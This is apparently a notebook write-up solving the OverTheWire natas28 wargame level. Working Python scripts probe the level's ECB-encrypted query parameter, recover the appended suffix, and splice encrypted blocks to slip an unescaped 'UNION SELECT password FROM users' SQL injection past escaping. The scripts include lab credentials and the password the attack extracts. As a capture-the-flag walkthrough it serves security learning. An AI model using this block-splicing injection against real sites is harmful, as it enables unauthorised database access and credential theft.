# natas 28

* first enter something into the search query and then add some nonsense in the url
      Incorrect amount of PKCS#7 padding for blocksize
* we see that some kind of encryption is used https://en.wikipedia.org/wiki/PKCS
* Use the following script to see that a block cipher is used: https://en.wikipedia.org/wiki/Block_cipher

In [11]:
import requests
import re
import urllib.parse
from requests.auth import HTTPBasicAuth
import base64

def getResultQueryLength(input):
    payload = {'query': input}
    r = requests.post("http://natas28.natas.labs.overthewire.org/", data=payload, auth=HTTPBasicAuth('natas28', 'JWwR438wkgTsNKBbcJoowyysdM82YjeF'))
    m = re.search('query=(.*)$', r.url).group(1)
    unquoted = urllib.parse.unquote(m)
    base64decoded = base64.b64decode(unquoted)
    return len(base64decoded)

for i in range(100):
    print(i, "'a's:\t", getResultQueryLength('a' * i), 'bytes result')

0 'a's:	 80 bytes result
1 'a's:	 80 bytes result
2 'a's:	 80 bytes result
3 'a's:	 80 bytes result
4 'a's:	 80 bytes result
5 'a's:	 80 bytes result
6 'a's:	 80 bytes result
7 'a's:	 80 bytes result
8 'a's:	 80 bytes result
9 'a's:	 80 bytes result
10 'a's:	 80 bytes result
11 'a's:	 80 bytes result
12 'a's:	 80 bytes result
13 'a's:	 96 bytes result
14 'a's:	 96 bytes result
15 'a's:	 96 bytes result
16 'a's:	 96 bytes result
17 'a's:	 96 bytes result
18 'a's:	 96 bytes result
19 'a's:	 96 bytes result
20 'a's:	 96 bytes result
21 'a's:	 96 bytes result
22 'a's:	 96 bytes result
23 'a's:	 96 bytes result
24 'a's:	 96 bytes result
25 'a's:	 96 bytes result
26 'a's:	 96 bytes result
27 'a's:	 96 bytes result
28 'a's:	 96 bytes result
29 'a's:	 112 bytes result
30 'a's:	 112 bytes result
31 'a's:	 112 bytes result
32 'a's:	 112 bytes result
33 'a's:	 112 bytes result
34 'a's:	 112 bytes result
35 'a's:	 112 bytes result
36 'a's:	 112 bytes result
37 'a's:	 112 bytes result
38 'a's:	 112

* we can see now that when we enter twelfe as the generated code is 80 bytes long
* if we enter 13 as the generated code is 96 bytes long
* the block size must therefore be 16 bytes
* also we now know that ECB is used because the first n bytes do not change
  * if something like CBC would have been used the first block would also change because of the IV
  
## Search for the block boundaries
* we now enter character by character and view the result splitted into blocks
* when a block changes at a smaller input and doesn't change after a certain threshold we know that this is the first block we can control with our input

In [7]:
import requests
import re
import urllib.parse
from requests.auth import HTTPBasicAuth
import base64

block_size = 16

def getResultQueryLength(input):
    payload = {'query': input}
    r = requests.post("http://natas28.natas.labs.overthewire.org/", data=payload, auth=HTTPBasicAuth('natas28', 'JWwR438wkgTsNKBbcJoowyysdM82YjeF'))
    m = re.search('query=(.*)$', r.url).group(1)
    unquoted = urllib.parse.unquote(m)
    base64decoded = base64.b64decode(unquoted)
    return base64decoded

for i in range(15):
    print(i)
    for block in range(80 // block_size):
        print(block, "\t", getResultQueryLength('a' * i)[block * block_size:(block + 1) * block_size])
    print()

0
0 	 b'\x1b\xe8%\x11\xa7\xba[\xfdW\x8c\x0e\xefFm\xb5\x9c'
1 	 b'\xdc\x84r\x8f\xdc\xf8\x9d\x93u\x1d\x10\xa7\xc7\\\x8c\xf2'
2 	 b'\xe8\x7f\xf6\x0c\x99\xadr\xcc\xbd\x94~4\x17\xa9\x01('
3 	 b'\xa7~\x8e\xd1\xaa\xbe\x0b]\x05\xc4\xff\xe6\xac\x14#\xab'
4 	 b'G\x8e\xb1\xa1\xfe&\x1a,l\x15\x06\x11\t\xb3\xfe\xda'

1
0 	 b'\x1b\xe8%\x11\xa7\xba[\xfdW\x8c\x0e\xefFm\xb5\x9c'
1 	 b'\xdc\x84r\x8f\xdc\xf8\x9d\x93u\x1d\x10\xa7\xc7\\\x8c\xf2'
2 	 b'\xab\x88\n\x8f\x13o\xbe\xb9\x89g\x89\x13$\xa1\xb0u'
3 	 b'\xbd\xfa\x10T\xechQ\\\xf9o*UDY\x19G'
4 	 b'\x90OK*\xbf,-v\x86\xaar\xa51Q\xc9p'

2
0 	 b'\x1b\xe8%\x11\xa7\xba[\xfdW\x8c\x0e\xefFm\xb5\x9c'
1 	 b'\xdc\x84r\x8f\xdc\xf8\x9d\x93u\x1d\x10\xa7\xc7\\\x8c\xf2'
2 	 b'\xb10\xa51\xbe\xc8\x9cpR\x13\xbf\xa5\xc9fz\xc7'
3 	 b'Hy\x9a\x07\xb1\xd2\x9bY\x82\x01\\\x93U\xc2\xe0\x0e'
4 	 b'\xad\xed\x9b\xdb\xac\xa6\xa7;q\xb3Z\x01\r,LW'

3
0 	 b'\x1b\xe8%\x11\xa7\xba[\xfdW\x8c\x0e\xefFm\xb5\x9c'
1 	 b'\xdc\x84r\x8f\xdc\xf8\x9d\x93u\x1d\x10\xa7\xc7\\\x8c\xf2'
2 	 b'/R\x93\xa6:

* if we take look at block 2 it doesnst change its value after entering 10 characters
* next we try to guess what text is appended after our input
* to do this we first enter 9 'a's and call the result A
* afterwards we enter 9 'a's and then follow those with any character and call the result B
* if block 2 of result A and B match the character following the 'a's is the one we guessed

In [17]:
import requests
import re
import urllib.parse
from requests.auth import HTTPBasicAuth
import base64
import string

block_size = 16

def getResultQueryLength(input):
    payload = {'query': input}
    r = requests.post("http://natas28.natas.labs.overthewire.org/", data=payload, auth=HTTPBasicAuth('natas28', 'JWwR438wkgTsNKBbcJoowyysdM82YjeF'))
    m = re.search('query=(.*)$', r.url).group(1)
    unquoted = urllib.parse.unquote(m)
    base64decoded = base64.b64decode(unquoted)
    return base64decoded

expected_result = getResultQueryLength('a' * 9)[2 * block_size:(2 + 1) * block_size]
print(expected_result)

for c in string.printable:
    next_try = 'a' * 9 + c
    print(next_try)
    guess = getResultQueryLength(next_try)[2 * block_size:(2 + 1) * block_size]
    
    if(guess == expected_result):
        print("Suffix character found:", c)
        break
    

b'\x9eb&\x86\xa5&@YW\x06\t\x9a\xbc\xb0R\xbb'
aaaaaaaaa0
aaaaaaaaa1
aaaaaaaaa2
aaaaaaaaa3
aaaaaaaaa4
aaaaaaaaa5
aaaaaaaaa6
aaaaaaaaa7
aaaaaaaaa8
aaaaaaaaa9
aaaaaaaaaa
aaaaaaaaab
aaaaaaaaac
aaaaaaaaad
aaaaaaaaae
aaaaaaaaaf
aaaaaaaaag
aaaaaaaaah
aaaaaaaaai
aaaaaaaaaj
aaaaaaaaak
aaaaaaaaal
aaaaaaaaam
aaaaaaaaan
aaaaaaaaao
aaaaaaaaap
aaaaaaaaaq
aaaaaaaaar
aaaaaaaaas
aaaaaaaaat
aaaaaaaaau
aaaaaaaaav
aaaaaaaaaw
aaaaaaaaax
aaaaaaaaay
aaaaaaaaaz
aaaaaaaaaA
aaaaaaaaaB
aaaaaaaaaC
aaaaaaaaaD
aaaaaaaaaE
aaaaaaaaaF
aaaaaaaaaG
aaaaaaaaaH
aaaaaaaaaI
aaaaaaaaaJ
aaaaaaaaaK
aaaaaaaaaL
aaaaaaaaaM
aaaaaaaaaN
aaaaaaaaaO
aaaaaaaaaP
aaaaaaaaaQ
aaaaaaaaaR
aaaaaaaaaS
aaaaaaaaaT
aaaaaaaaaU
aaaaaaaaaV
aaaaaaaaaW
aaaaaaaaaX
aaaaaaaaaY
aaaaaaaaaZ
aaaaaaaaa!
aaaaaaaaa"
aaaaaaaaa#
aaaaaaaaa$
aaaaaaaaa%
Suffix character found: %


* as we can see after our input the program appends a percent sign
* because we know that earlier challanges used a mysql database we can guess that this time a query similiar to the following form is generated: `select * from jokes where text like '%$INPUT%'`
* if we try to enter any sql injection into the search form all useful characters are escaped and do not result in a sql injection
* by using the block cipher we can create our own injection string and fire our own query
* The idea is to use the padding to our advantage

## Solution:
1. add 9 characters of padding
2. 10th character will be a single quote
3. this will be escaped 
  * the backslash will be in the second block, single quote in third
4. grab unescaped injection string and build propery url

In [90]:
import requests
import re
import urllib.parse
from requests.auth import HTTPBasicAuth
import base64
import string

block_size = 16
padding_length = 9

def getResultQueryLength(input):
    payload = {'query': input}
    r = requests.post("http://natas28.natas.labs.overthewire.org/", data=payload, auth=HTTPBasicAuth('natas28', 'JWwR438wkgTsNKBbcJoowyysdM82YjeF'))
    m = re.search('query=(.*)$', r.url).group(1)
    unquoted = urllib.parse.unquote(m)
    base64decoded = base64.b64decode(unquoted)
    return base64decoded

# This is the injection we want to encrypt
injection_string = 'a' * padding_length + "' UNION SELECT password FROM users; #"

# First calculate how many blocks are required to encrypt the injection string
required_blocks = (len(injection_string) - padding_length - 1) // block_size # 1 for the tick before union
if (len(injection_string) - padding_length - 1) % block_size != 0: # if inject is not exact multiple of block size
    required_blocks += 1 #  add one block

print("required blocks:", required_blocks)

# Now get the raw injection from the server
raw_injection = getResultQueryLength(injection_string)

# Get a padding string from the server
encrypted_padding = getResultQueryLength('a' * 30)

# Create fake query by combining the first blocks of the padding
faked_query = encrypted_padding[:block_size * 3]
# With the relevant parts of our encrypted injection string
faked_query += raw_injection[block_size * 3:block_size * 3 + (required_blocks * block_size)] 
# Followed by the remaining padding
faked_query += encrypted_padding[block_size * 3:]

# base64 encode and url encode
base64_encoded = base64.b64encode(faked_query)
url_encoded =  requests.utils.quote(base64_encoded)
url_encoded = url_encoded.replace('/', '%2F')

# and finally fire against the database
r = requests.get('http://natas28.natas.labs.overthewire.org/search.php/?query=' + url_encoded, auth=HTTPBasicAuth('natas28', 'JWwR438wkgTsNKBbcJoowyysdM82YjeF'))
print(r.text)

required blocks: 3
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas28", "pass": "JWwR438wkgTsNKBbcJoowyysdM82YjeF" };</script></head>
<body>
<!-- morla/10111 -->
<h1>natas28</h1>
<style>
ul {
  margin: 1em 0;
  padding: 0 0 0 40px;
}

li {
  margin: 1em 0;
}
</style>
<div id="content">
<h2> Whack Computer Joke Database</h2><ul><li>airooCaiseiyee8he8xongien9euhe8

# Tada!!!